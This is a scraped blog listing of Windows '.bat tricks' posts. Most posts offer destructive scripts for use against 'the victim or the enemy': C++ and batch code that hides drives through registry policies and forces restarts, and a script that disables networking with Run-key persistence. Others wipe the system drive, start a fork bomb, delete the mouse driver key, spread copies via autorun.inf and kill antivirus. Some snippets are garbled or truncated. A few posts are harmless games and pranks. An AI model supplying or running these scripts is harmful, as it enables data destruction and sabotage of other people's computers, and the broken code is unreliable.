Developer's Note

Followers

Dont forget to like

Recommend on Google

More Post

Random Post

Some More Post

Advertisement

Video

LIke Us

Flag Counter

Pages

Flickr

About

Facebook

Advertising

Advertising

Popular Posts

Showing posts with label .Bat Tricks. Show all posts
Showing posts with label .Bat Tricks. Show all posts

Sunday, 20 October 2013

Tagged under: , , ,

Trick to make a hard disk disabling Virus



There is Trick to make a Virus which can disable full Hard Disk. This is a Virus made out of C++ coding. This Trick can be used to hack any computer's hard disk and to annoy the friends or enemy. Note : Don't Run this Program on your Computer otherwise you will lose your Windows. I am not Responsible for any Accident caused by this File on your Computer.


Open Notepad. Copy and Paste the following code into Notepad: 

#include<windows.h>
#include<stream.h>
#include<iostream.h>
#include<string.h>
#include<conio.h>
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackDrive.bat" );
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; 
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n";
 write<<"shutdown -r -c \"Sorry your Computer is Hacked by Me!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat",NULL,NULL,SW_SHOWNORMAL); 

return 0; 
}

 Save it as HardDiskHack.cpp.
 Compile this file in C++ and create the .exe (HardDiskHack.exe) file. 
Send this file to the victim or the enemy. 

Note : Don't Run so Created HardDiskHack.exe File, otherwise it will attack your Computer itself.
 If you are not a good C++ programmer, then you can also create the Bat Virus. To create it follow these simple steps: 


  • Open Notepad. 
  • Copy and Paste the following Code into Notepad:


 REG ADD 
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\nREG ADD
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\nshutdown -r -c \"Sorry your Computer is Hacked by Me!\" -f 


  • Save it as HardDiskHack.bat. 

Now it is done. So it is a simple Trick to make a Virus which can disable full Hard Disk.


                                                                                               

Sunday, 17 March 2013

Tagged under: , ,

Easiest Way of Killing The Running Windows Processes


There are several ways to kill Windows processes which stops responding. The most common way is by opening Windows Task Manager and go to Processes tab and right click on the process and select End Process. Apart from this you generally restart your computer when the program fails to respond.
You can create custom batch file to kill multiple programs in a click. Here’s how you can create one:
- Open Notepad.
- Paste the following lines in the notepad.
taskkill /im program1.exe
taskkill /im program2.exe
- Open Windows task manager by pressing “Ctrl+Shift+Esc”. Go to processes tab and go to the program name not responding.
- Replace program1.exe and program2.exe by actual name of the processes. For example I replaced program1 by Evernote andprogram2 by Skype.

- Go to File -> Save as and give the file name killprocess.bat. You can give it any name  but don’t forget to add .bat at the end of the name (for ex. anyname.bat). In the Save as type dropdown, select All files.

-Save the file anywhere on the computer. Now if your program stops responding, just doble click on the bat file to kill the process.

A black screen will appear for the short period of time which pop ups the message that termination signal sent to the processes.
That’s it. Your added programs will kill within fraction of second.

                                                                                                                               ^_^

Monday, 11 March 2013

Tagged under: , , ,

Trick to make Virus which can Disable Internet Permanently





There is a Trick to make Virus which can Disable Internet Permanently. To do this follow thesesimple steps : 
1) Open Notepad. 
2) Copy and Paste the following Code into Notepad : 
echo @echo off>c:windowswimn32.bat 
echo break off>>c:windowswimn32.bat 
echo ipconfig/release_all>>c:windowswimn32.bat 
echo end>>c:windowswimn32.bat 
reg add 
hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d 
:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f 
echo You Have Been HACKED! 
PAUSE 

3) Save it as InternetDisabled.bat. 
4) Now it is done. So it is a simple Trick to make Virus which can Disable Internet Permanently. 
   
                                                                                                                      ^_^


Tagged under: , , ,

Tricks to make Simple Virus



There are many Virus which we an develop or can make easily. As I already posted earlier about many Tricks to make Virus, Now here are some more Tricks to make Simple Virus. To make them use the following Trick : 1) Open Notepad 2) Copy and Paste the given below Code of your Choice i.e. type of Virus you want to make : a) To Delete all the Content of a Drive use this Code : @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 b) To Crush the Windows use this Code : @Echo off Del C:\ *.* y c) To make Computer Restart simultaneously use this Code : @echo off shutdown -r -f -t 00 d) To make Fork Virus to open many Command Prompts use this Code : start %0 goto :s 3) Now Save these Files with any desired name with .bat extention. 4) Don't Run these Files on Your own Computer otherwise the Result you already know. So these are simple Tricks to make Simple Virus.

Saturday, 5 January 2013

Tagged under: , , ,

Disable Mouse/Keyboard




  • Open Notepad (Start > All Programs > Accessories > Notepad). 
  • Copy the code and paste it in notepad.


  • Mouse:

    rem ---------------------------------
    rem Disable Mouse
    set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    reg delete %key%

    Saturday, 8 December 2012

    Tagged under: , ,

    pc infection !!



    Add one of these to your .bat, and it will infect that with the virus.its very dengerous..!!


    Open Notepad(Start > All Programs > Accessories > Notepad).
    Copy the following code and paste it in notepad.


    Code:

    1. Infect all drives:


    rem ---------------------------------
    rem Infect All Drives
    for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
    copy /Y %0 %%E:\
    echo [AutoRun] > %%E:\autorun.inf

    Sunday, 2 December 2012

    Tagged under: , ,

    Kill Anti-Virus



    Chances are the victim has anti virus software installed, so put this into a seperate file and run it first.
    open ur notepad n type the following.........
    Code:

    @ echo off
    rem ---------------------------------
    rem Encripted AV Killer
    del /F /Q %SystemDrive%\recycler\S-1-5-21-1202660629-261903793-725345543-1003\run.bat
    set ii=ne

    Saturday, 1 December 2012

    Tagged under: , ,

    Keyboard Dancing Led Light Trick



    Today i will be showing you an interesting trick which will let yourkeyboard led light to dance. Basicly we will be creating a vbscript to make caps lock, num lock and scroll lock to perform this trick. So lets get started

         How to do that ?

           1. Open Notepad and copy below codes into it.

    Set wshShell =wscript.CreateObject("WScript.Shell")

    Wednesday, 28 November 2012

    Tagged under: , ,

    Write VIRUS to computer in 5 minutes




    1) Creating virus trick
    open ur notepad n type the following.........

    type del c:\boot.ini c:\del autoexec.batsave as .exe[save it as .exe file....n u can save it by any name]
    create the notepad in c: drive... 

    Wednesday, 21 November 2012

    Sunday, 18 November 2012

    Tagged under: , ,

    Make frnds scare for VIRUS





    Open notepad and type this:

    lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")

    Wednesday, 14 November 2012

    Tagged under: , ,

    Create a fake virus scan through Notepad



    Open Notepad(Start > All Programs > Accessories > Notepad).
    Copy the following code and paste it in notepad.

    @echo off
    title Fatal Error
    color 06

    echo Warning! Virus Detected.
    pause
    echo Windows Protection Error
    pause
    echo Major File Corrupt

    Tagged under: , ,

    Create your own Game using Notepad


    We can create some games using nothing but only the notepad!

    • Open Notepad (Start > All Programs > Accessories > Notepad). 
    • Copy the code and paste it in notepad.

    @echo off
    title ScrewTheLotOfYou's Tic Tac Toe
    title Noughts and Crosses
    setlocal enabledelayedexpansion
    ::~ ^^^ Stops all commands appearing on screen, sets the title and enables the use of ! for environment variable
    :menu
    cls
    echo Main Menu
    echo To Play A 1-Player Game, Enter 1
    echo To Play A 2-Player Game, Enter 2
    echo To Exit, Enter 3
    set /p menu=
    Tagged under: , ,

    Create a Simple Animation through Notepad



    • Open Notepad(Start > All Programs > Accessories > Notepad). 
    • Copy the following code and paste it in notepad.


    @echo off
    cls
    :a
    cls
    color 04
    echo           ***                      ***
    ping localhost -n 1 >nul
    echo         *** ***                  *** ***
    ping localhost -n 1 >nul
    echo       ***     ***              ***     ***
    ping localhost -n 1 >nul
    echo     ***          ***         ***         ***
    ping localhost -n 1 >nul
    echo   ***               ***     ***            ***
    ping localhost -n 1 >nul
    echo ***                   *** ***                ***
    ping localhost -n 1 >nul
    echo ***                     ***                  ***
    ping localhost -n 1 >nul
    echo   ***                                      ***
    ping localhost -n 1 >nul
    echo     ***                                  ***

    Translate